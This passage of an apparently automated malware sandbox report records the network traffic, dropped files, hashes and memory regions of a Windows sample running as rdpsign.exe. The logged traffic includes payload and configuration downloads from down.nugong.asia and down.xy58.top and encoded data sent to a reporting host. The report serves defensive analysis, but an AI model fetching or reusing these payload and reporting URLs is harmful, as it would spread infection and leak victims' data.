      IN CNAME
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.13.153.152
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.48.138.18
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      111.206.23.199
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      112.50.95.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      117.27.246.96
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      119.36.90.164
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.143.236.7
      bd-l7-online-tob-oversea-opt.s.vedsalb.com
      IN A
      36.248.38.100
    • flag-us
      GET
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      rdpsign.exe
      Remote address:
      104.193.88.77:443
      Request
      GET /8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: sp1.baidu.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Cache-Control: private
      Content-Length: 354
      Content-Type: application/json;charset=gbk
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Expires: Tue, 17 Oct 2023 07:38:22 GMT
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      P3p: CP=" OTI DSP COR IVA OUR IND COM "
      Server: Apache
      Set-Cookie: BAIDUID=5D16934795C09A11CC095B3B33C6B15A:FG=1; expires=Wed, 16-Oct-24 07:38:22 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Set-Cookie: BAIDUID=A4FC91B6CB4CAE79F0E67D013DC81899:FG=1; expires=Wed, 16-Oct-24 07:38:22 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
      Tracecode: 23024345590415660810101715
      Tracecode: 23024341420407075594101715
      X-Powered-By: HHVM
    • flag-cn
      GET
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      b9de8270
      Remote address:
      111.13.153.152:80
      Request
      GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: ocsp.trust-provider.cn
      Response
      HTTP/1.1 200 OK
      Server: volc-dcdn
      Content-Type: application/ocsp-response
      Content-Length: 599
      Connection: keep-alive
      Date: Tue, 17 Oct 2023 07:38:22 GMT
      Age: 1
      CF-Cache-Status: HIT
      CF-RAY: 816301a1de422544-SJC
      ETag: "45ca5445b1ecdd148809b4c7123fe87594c33cb1"
      Expires: Sat, 21 Oct 2023 21:19:06 GMT
      Last-Modified: Sat, 14 Oct 2023 21:19:07 GMT
      WS-Cache-Status: 0
      X-CCACDN-Proxy-ID: scdpinlb2
      X-Frame-Options: SAMEORIGIN
      X-Via: 1.1 PS-CZX-01YIQ141:4 (Cdn Cache Server V2.0), 1.1 PSbjyd4dq13:7 (Cdn Cache Server V2.0)
      X-Ws-Request-Id: 652e2f4b_PSbjyd4hh12_39853-31280
      cache-via: cache.n173-159-130.bdcdn-bjcm
      x-request-ip: 154.61.71.13
      x-tt-trace-tag: id=5
      x-dsa-trace-id: 1697528302b17e28311cc3ea8e2357e705230bdac7
      X-Bdsa-Cache-Status: HIT
      Cache-Via-Status: cache.n173-159-130.bdcdn-bjcm(HIT)
      X-Bdsa-Cache-Tm: 1697525579-877
      Accept-Ranges: bytes
      via: n173-159-129.bdcdn-bjcm.ToB
      X-Dsa-Origin-Status: 200
      server-timing: cdn-cache;desc=HIT, origin;dur=0, edge;dur=0
    • flag-us
      DNS
      77.88.193.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.88.193.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      101.15.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      101.15.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      226.21.18.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      226.21.18.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      152.153.13.111.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      152.153.13.111.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      2.2.2.234.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      2.2.2.234.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      211.112.123.233.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      211.112.123.233.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      down.xy58.top
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      down.xy58.top
      IN A
      Response
      down.xy58.top
      IN CNAME
      down.xy58.top.cdn.dnsv1.com.cn
      down.xy58.top.cdn.dnsv1.com.cn
      IN CNAME
      frnfx6xf.slt.sched.tdnsv8.com
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
    • flag-us
      DNS
      down.xy58.top
      rdpsign.exe
      Remote address:
      8.8.8.8:53
      Request
      down.xy58.top
      IN A
      Response
      down.xy58.top
      IN CNAME
      down.xy58.top.cdn.dnsv1.com.cn
      down.xy58.top.cdn.dnsv1.com.cn
      IN CNAME
      frnfx6xf.slt.sched.tdnsv8.com
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      211.93.212.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      58.144.226.248
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.187
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.111
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      122.189.171.55
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.231.136.87
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      221.15.67.145
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      36.248.54.85
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      125.39.165.235
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      123.12.213.243
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      218.29.50.234
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      42.56.81.104
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.232
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      119.36.226.196
      frnfx6xf.slt.sched.tdnsv8.com
      IN A
      110.249.196.101
    • flag-cn
      GET
      http://down.xy58.top/res/icos/9.ico
      rdpsign.exe
      Remote address:
      221.15.67.145:80
      Request
      GET /res/icos/9.ico HTTP/1.1
      Accept-Encoding: gzip
      User-Agent: CHM_MSDN
      Host: down.xy58.top
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Last-Modified: Fri, 04 Nov 2022 06:04:22 GMT
      Etag: "e00fb9f91bcbbccb56a2455456d2b70a"
      Content-Type: image/vnd.microsoft.icon
      Date: Sat, 07 Oct 2023 17:54:03 GMT
      Server: tencent-cos
      x-cos-hash-crc64ecma: 15586908648096285918
      x-cos-meta-md5: e00fb9f91bcbbccb56a2455456d2b70a
      x-cos-request-id: NjUyMTliM2JfZGUzMTIyMDlfZjg3Zl80NTAxMjJi
      Content-Length: 187798
      Accept-Ranges: bytes
      X-NWS-LOG-UUID: 15068315473125540156
      Connection: keep-alive
      X-Cache-Lookup: Cache Hit
    • flag-us
      DNS
      145.67.15.221.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      145.67.15.221.in-addr.arpa
      IN PTR
      Response
      145.67.15.221.in-addr.arpa
      IN PTR
      hnkdjzadsl
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      198.187.3.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      198.187.3.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      8.3.197.209.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.3.197.209.in-addr.arpa
      IN PTR
      Response
      8.3.197.209.in-addr.arpa
      IN PTR
      vip0x008map2sslhwcdnnet
    • flag-us
      DNS
      13.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      13.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      195.98.74.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      195.98.74.40.in-addr.arpa
      IN PTR
      Response
    • 122.189.171.111:443
      https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip
      tls, http
      b9de8270
      18.3kB
       484.9kB
       359
      357

      HTTP Request

      GET https://down.nugong.asia/pgm/mpr/c995ec7fd4f57c0d/69f335c8397887d4.zip

      HTTP Response

      200
    • 122.189.171.111:80
      http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt
      http
      rdpsign.exe
      19.6kB
       466.1kB
       365
      359

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/69f335c8397887d4.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/6e3a93a55cea3a23/557a93a3c14e34f52a4c5d41926016b1dd2f3f7d426160b564.zip

      HTTP Response

      200

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a2a7ea9235e2fcd905bb992835b01fa10c618d25ea412d14e66ead333985d7880e6e7acd03017a34fb40b3f84ce717f77b29e0c7abd541979b0bd17bd4bf4784ebe7dd605a6b6025e3b7de54cf1cc28f1c0d6329c26e45207b0b6022d35e3984a25cea5bca79c5a2065722515486458a1dc051ebed21888d3145a24cbc4f4a537a7c77962d6adad85a13e3cde3b845993fd0a5880de28558ab7e2a43c4bf3efa1c81eb5b608d7a4f6e5687d60f521df126096198579ba176b2dd3dd34e2654138c3c74eaffdbab1ec2a6ed1c4da0f6448a5eca47dc9fee3469f90b405159314a5248e446cc9c8ea907461bcfa8ad13436b47819f4994f07de772311f956ef1a01db15ef30690ef35fb8ef85233cab2f080c55d9ba6167a1f0ad747e96a429edbc735421c71cc139656b3e329a5e060356e730f00072ffc1f56e0caf5bb5c049f57b46c63f456a33889713703c62ca479ee5af5f4c20409904d8894f4dc26a1fc456445ba7c593ef2e7348b01d78a2649fc1569beb45238f2e18fcc15d26981ca21227236b549b0e65ed95992ef346896c83a8180ed437f6912937e0ee2680c0b853c393bc1d7d9142e598fdd8ce6e7f18419deaa524a1e818a1a03c7d833a001654d87d0b5fb0aeef0763900497c6ffc0085f2fb14b1ad299b020057ddea2b1dd0351de412c0a1ad84d04c0dd65b494328643f289e5fc2042

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/zbcfg_exe.txt

      HTTP Response

      200
    • 101.227.134.27:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      rdpsign.exe
      1.1kB
       4.4kB
       14
      12

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      rdpsign.exe
      782 B
       2.2kB
       7
      5

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 122.189.171.111:443
      https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4
      tls, http
      b9de8270
      1.6kB
       1.0kB
       13
      12

      HTTP Request

      GET https://nreprot.nugong.asia/report.php?type=client&data=c7f89dc64da77380b9e063f0950731f26303ad887c545e7380f702d94883cc002f8772e105d493c6d38caceeb3d91a29207a241567b1c2bd69e4c84ded81e8b3b7d206fc6c395650f8ce890c9949165727f7e26621c03fb29296721880bceb543ee0f217537d9faa3418e0573a6af38632b666cbd2e111a42e6f54c54357f2ad9df263ce8b6d21e463992f3c8167402b51ba1a2943c4bf96b2a7403109ad437a29dad3edf8b411b17986d0524295c1a9014ab0e046277536cd9b8ac2f31c5621522394db5833817b37057f01f7992245dde928f9a61bbf1e2ef9368e5e8172a17bfe32fcc26644b4

      HTTP Response

      200
    • 104.193.88.77:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      rdpsign.exe
      1.4kB
       7.1kB
       19
      16

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 111.13.153.152:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      b9de8270
      565 B
       2.0kB
       7
      7

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 221.15.67.145:80
      http://down.xy58.top/res/icos/9.ico
      http
      rdpsign.exe
      6.8kB
       194.1kB
       145
      144

      HTTP Request

      GET http://down.xy58.top/res/icos/9.ico

      HTTP Response

      200
    • 114.114.114.114:53
      down.nugong.asia
      dns
      b9de8270
      62 B
       392 B
       1
      1

      DNS Request

      down.nugong.asia

      DNS Response

      122.189.171.111
      211.93.212.232
      123.12.213.243
      221.15.67.145
      119.36.226.232
      58.144.226.248
      36.248.54.85
      122.189.171.55
      119.36.226.196
      42.56.81.104
      125.39.165.235
      110.249.196.101
      218.29.50.234
      123.12.213.187
      42.231.136.87

    • 8.8.8.8:53
      158.240.127.40.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      158.240.127.40.in-addr.arpa

    • 8.8.8.8:53
      254.105.26.67.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      254.105.26.67.in-addr.arpa

    • 8.8.8.8:53
      114.114.114.114.in-addr.arpa
      dns
      74 B
       106 B
       1
      1

      DNS Request

      114.114.114.114.in-addr.arpa

    • 8.8.8.8:53
      111.171.189.122.in-addr.arpa
      dns
      74 B
       162 B
       1
      1

      DNS Request

      111.171.189.122.in-addr.arpa

    • 8.8.8.8:53
      140.32.126.40.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      140.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      108.211.229.192.in-addr.arpa
      dns
      74 B
       145 B
       1
      1

      DNS Request

      108.211.229.192.in-addr.arpa

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      rdpsign.exe
      62 B
       94 B
       1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.27
      101.227.134.49

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      rdpsign.exe
      62 B
       122 B
       1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      27.134.227.101.in-addr.arpa
      dns
      73 B
       132 B
       1
      1

      DNS Request

      27.134.227.101.in-addr.arpa

    • 8.8.8.8:53
      205.48.246.47.in-addr.arpa
      dns
      72 B
       143 B
       1
      1

      DNS Request

      205.48.246.47.in-addr.arpa

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      rdpsign.exe
      59 B
       144 B
       1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      104.193.88.77
      104.193.88.123

    • 8.8.8.8:53
      101.14.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      101.14.18.104.in-addr.arpa

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      b9de8270
      68 B
       300 B
       1
      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response

      111.13.153.152
      111.48.138.18
      111.206.23.199
      112.50.95.96
      117.27.246.96
      119.36.90.164
      36.143.236.7
      36.248.38.100

    • 8.8.8.8:53
      77.88.193.104.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      77.88.193.104.in-addr.arpa

    • 8.8.8.8:53
      101.15.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      101.15.18.104.in-addr.arpa

    • 8.8.8.8:53
      226.21.18.104.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      226.21.18.104.in-addr.arpa

    • 8.8.8.8:53
      152.153.13.111.in-addr.arpa
      dns
      73 B
       138 B
       1
      1

      DNS Request

      152.153.13.111.in-addr.arpa

    • 234.2.2.2:22924
      rdpsign.exe
      138 B
       3
    • 233.123.112.211:36635
      rdpsign.exe
      184 B
       2
    • 8.8.8.8:53
      2.2.2.234.in-addr.arpa
      dns
      68 B
       125 B
       1
      1

      DNS Request

      2.2.2.234.in-addr.arpa

    • 8.8.8.8:53
      211.112.123.233.in-addr.arpa
      dns
      74 B
       131 B
       1
      1

      DNS Request

      211.112.123.233.in-addr.arpa

    • 8.8.8.8:53
      down.xy58.top
      dns
      rdpsign.exe
      118 B
       772 B
       2
      2

      DNS Request

      down.xy58.top

      DNS Request

      down.xy58.top

      DNS Response

      221.15.67.145
      123.12.213.187
      42.56.81.104
      58.144.226.248
      125.39.165.235
      110.249.196.101
      36.248.54.85
      119.36.226.196
      119.36.226.232
      123.12.213.243
      122.189.171.55
      122.189.171.111
      211.93.212.232
      42.231.136.87
      218.29.50.234

      DNS Response

      211.93.212.232
      58.144.226.248
      123.12.213.187
      122.189.171.111
      122.189.171.55
      42.231.136.87
      221.15.67.145
      36.248.54.85
      125.39.165.235
      123.12.213.243
      218.29.50.234
      42.56.81.104
      119.36.226.232
      119.36.226.196
      110.249.196.101

    • 8.8.8.8:53
      145.67.15.221.in-addr.arpa
      dns
      72 B
       99 B
       1
      1

      DNS Request

      145.67.15.221.in-addr.arpa

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      198.187.3.20.in-addr.arpa
      dns
      71 B
       157 B
       1
      1

      DNS Request

      198.187.3.20.in-addr.arpa

    • 8.8.8.8:53
      8.3.197.209.in-addr.arpa
      dns
      70 B
       111 B
       1
      1

      DNS Request

      8.3.197.209.in-addr.arpa

    • 8.8.8.8:53
      13.227.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      13.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      195.98.74.40.in-addr.arpa
      dns
      71 B
       145 B
       1
      1

      DNS Request

      195.98.74.40.in-addr.arpa

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\rdpsign.exe
      Filesize

      98KB

      MD5

      a85f09a9d65752c5ea50eba8431b87af

      SHA1

      578655a959acb372602b6715e6589ded4ad45032

      SHA256

      8cb8a09b32c56c8e1c7bca6b2ef24c9705fb494ec2ca834256b56ec378c90159

      SHA512

      781acb6bbd7fe53a2c6e80839c4c7168a1f0919df06d296953f7a4f25c891c346041f82f4517941b0c4cac976a91697002e5a441aab012674ced8343fd80dc2d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IcoC776.exe
      Filesize

      145KB

      MD5

      d2a1752df6431ac0b448cc8f25d0b3d4

      SHA1

      87afaeb38c8bec3278830a470f94ef39726fb26c

      SHA256

      9f4665e08fbfb72b2317bafa85b9ed9491f7df32dd9d818ca726d6d2ae2d4f35

      SHA512

      8411240eea9dd8b048da8a8023f87a2e3411ab67e8f2961ca5098b9df7ba27a5d2b31e339bb2d122a18880633dac569bbf3b6061619656a2582fe5fb16293688

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\IcoDE1C.tmp
      Filesize

      183KB

      MD5

      e00fb9f91bcbbccb56a2455456d2b70a

      SHA1

      9ad3517db35b63ac08185f395a34980eea5d0840

      SHA256

      07b1a5e314075499de803a074a431ac7376121412b190c1f2deae5976b55403f

      SHA512

      ea3c303976e0ad18a0071c8d16570153ad03f257cc3f5bc59ac3ca3d680a18e714f9711938aa0ebba45532fa4a2b43863f6d210a7ef67ce95d576dd5153cdd20

      Download Submit

    • C:\Users\Admin\Desktop\Íæ´«ÆæÇëµãÎÒ.lnk
      Filesize

      1KB

      MD5

      fbde3b58e62193a9ab361622026c866a

      SHA1

      08fb1e1a42bca541bf9eb1c2f139ab824e570247

      SHA256

      d171bf7d203bf38b882776ded1482f7a6ae6fa5de63b5f91c44dee9e291d6369

      SHA512

      64fa8b59523b2e00b78128dca68324c87d769d37cd7f04e21d5c3ed856325b3d2ed88a08e1c1f900a18eba8df8714fe8d099a7b970446eef1330e2ab3ff89377

      Download Submit

    • C:\Windows\SysWOW64\b9de8270
      Filesize

      399KB

      MD5

      96e1bdff0b93a2b3b55c270933efcbe5

      SHA1

      3b976d555733d10026c2dfcae146f119ff7d6596

      SHA256

      38f71d47fa8ba9eded1309e2b7930e03ea814eea417f0efc5542e94c523693a4

      SHA512

      917ffe3c482cf62e669ee1190e65441c614edeed7419e624665d80e366f1493099ac6a3560560babac629e15a16d28e26a3fac252af7c9671ac934c2bb36e9f2

      Download Submit

    • C:\Windows\SysWOW64\b9de8270
      Filesize

      399KB

      MD5

      96e1bdff0b93a2b3b55c270933efcbe5

      SHA1

      3b976d555733d10026c2dfcae146f119ff7d6596

      SHA256

      38f71d47fa8ba9eded1309e2b7930e03ea814eea417f0efc5542e94c523693a4

      SHA512

      917ffe3c482cf62e669ee1190e65441c614edeed7419e624665d80e366f1493099ac6a3560560babac629e15a16d28e26a3fac252af7c9671ac934c2bb36e9f2

      Download Submit

    • memory/548-19-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/548-68-0x0000020CE1CB0000-0x0000020CE1D67000-memory.dmp

      Filesize

      732KB

      Download

    • memory/548-18-0x0000020CDF420000-0x0000020CDF423000-memory.dmp

      Filesize

      12KB

      Download

    • memory/548-21-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/548-64-0x0000020CDF6F0000-0x0000020CDF6F1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-22-0x00007FFA247D0000-0x00007FFA247E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/548-69-0x0000020CE1090000-0x0000020CE1091000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-70-0x0000020CE10A0000-0x0000020CE10A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-73-0x0000020CE1CB0000-0x0000020CE1D67000-memory.dmp

      Filesize

      732KB

      Download

    • memory/548-67-0x0000020CE1080000-0x0000020CE1081000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-60-0x00007FFA247D0000-0x00007FFA247E0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/548-66-0x0000020CE10A0000-0x0000020CE10A1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/548-62-0x0000020CE0EB0000-0x0000020CE0F7B000-memory.dmp

      Filesize

      812KB

      Download

    • memory/548-63-0x0000020CE1090000-0x0000020CE1091000-memory.dmp

      Filesize

      4KB

      Download

    • memory/584-27-0x0000022C20A20000-0x0000022C20A48000-memory.dmp

      Filesize

      160KB

      Download

    • memory/584-65-0x0000022C20A60000-0x0000022C20A61000-memory.dmp

      Filesize

      4KB

      Download

    • memory/584-26-0x0000022C20A60000-0x0000022C20A61000-memory.dmp

      Filesize

      4KB

      Download

    • memory/584-24-0x0000022C20A10000-0x0000022C20A13000-memory.dmp

      Filesize

      12KB

      Download

    • memory/3172-61-0x0000000002430000-0x0000000002431000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3172-47-0x0000000008700000-0x00000000087F7000-memory.dmp

      Filesize

      988KB

      Download

    • memory/3172-11-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB

      Download

    • memory/3172-13-0x0000000002430000-0x0000000002431000-memory.dmp

      Filesize

      4KB

      Download

    • memory/3172-12-0x0000000008700000-0x00000000087F7000-memory.dmp

      Filesize

      988KB

      Download

    • memory/3172-10-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB

      Download

    • memory/3172-8-0x0000000002410000-0x0000000002413000-memory.dmp

      Filesize

      12KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.